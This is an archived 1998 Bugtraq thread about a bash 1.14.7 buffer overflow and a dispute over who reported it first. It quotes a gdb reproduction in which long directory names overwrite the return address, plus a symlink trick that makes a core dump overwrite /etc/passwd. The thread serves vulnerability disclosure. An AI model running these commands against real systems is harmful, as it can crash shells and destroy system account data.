Bugtraq mailing list archives

Re: Buffer overflow in bash 1.14.7(1)

From: drazvan () KAPPA RO (Razvan Dragomirescu)
Date: Thu, 10 Sep 1998 20:37:54 +0300


Hello all,

I'm posting this again, since the last message did not get through (Aleph,
I think I'm entitled to this). The bug is quite old and has been reported
by me to Bugtraq and Best-of-Security in August 1997. If it's about
credits, you can read the original post at
http://www.insecure.org/sploits/bash.pwd.overflow.html


Thanks
Razvan

--
Razvan Dragomirescu
KAPPA-NET Romania
E-Mail:         drazvan () kappa ro
Alternate:      drazvan () roedu net drazvan () romus ro
Old:            drazvan () romania ro drazvan () guv ro drazvan () lbi ro
Home Phone: +(40)-1-686.66.21 -- Work Phone: +(40)-1-336.57.71
"Smile, tomorrow will be worse" (Murphy)


On Thu, 10 Sep 1998, Fiji wrote:

ummm....I notified Redhat back on April 3 about this bug. It seems that
they weren't too interested back then in doing anything about...and it
looks like they aren't too interested now in giving credit where credit is
due.

<copy of original message>
Date: Fri, 3 Apr 1998 09:56:13 -0500 (EST)
From: Fiji <jfay () stetson edu>
To: bugs () redhat com
Subject: found a bug.

Well it looks like if you cd into /proc/self/root/proc/self/root...692
characters later.../proc/self/root it will core.

So what happens if I create a directory structure that is huge...
i.e.
~fiji/ggggggggggggggggggggggggggggggggggggggggggggggggggggggg
ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg
gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg
ggggggggggggggggggggggggggggggggggggggggg/ggg and so forth.

now at the bottom of this sturcture let's do the following:

ln -s /etc/passwd ~fiji/g*/g*/g*/g*/g*/g* core
now if root for whatever reason decides to cd into this...then the shell
will die and core which will follow the symlink and corrupt /etc/passwd.

Thought you all might like to know...so why exactly do cores follow
symlinks?

-Fiji
CIT Stetson University
Unix System Administrator

</copy or original message>

-Fiji

On Fri, 4 Sep 1998, Joao Manuel Carolino wrote:

Date: Fri, 4 Sep 1998 16:09:28 +0000
From: Joao Manuel Carolino <root () EINSTEIN DHIS EU ORG>
To: BUGTRAQ () netspace org
Subject: Buffer overflow in bash 1.14.7(1)

If you cd in to a directory which has a path name larger than 1024 bytes
and you have '\w' included in your PS1 environment variable (which makes
the path to the current working directory appear in each command line
prompt), a buffer overflow will occur.
The following was tested on my machine, running Slackware 3.5:

einstein:~# gdb bash
[...]
(gdb) r
Starting program: /bin/bash
bash# PS1='\w '
~ cd /tmp
/tmp mkdir `perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x
255'`
/tmp cd
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!

AA!

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/

(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x804ed72 in sigprocmask ()
(gdb) backtrace
#0  0x804ed72 in sigprocmask ()
#1  0xe9 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.

                                        Regards,
                                                Joao

Current thread:

Re: Buffer overflow in bash 1.14.7(1), (continued)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
  - Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)
- sshd exploit? Navindra Umanee (Sep 05)
  - Re: sshd exploit? Seth David Schoen (Sep 06)
  - Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
    - Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
    - Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Fiji (Sep 10)
  - Re: Buffer overflow in bash 1.14.7(1) Razvan Dragomirescu (Sep 10)
  - Fw: Exploit for SCO. Leshka (Sep 10)
    - Re: Fw: Exploit for SCO. John W. Temples (Sep 11)
  - ISS Vulnerability Alert: Windows Backdoors Update X-Force (Sep 10)
  - security problems with jidentd Mitchell Blank Jr (Sep 10)
    - Re: security problems with jidentd Scott Fuhrman (Sep 11)
  - Cisco security notice: Cisco PIX and CBAC Fragmentation attack psirt () cisco com (Sep 11)
- Re: Buffer overflow in bash 1.14.7(1) //Stany (Sep 05)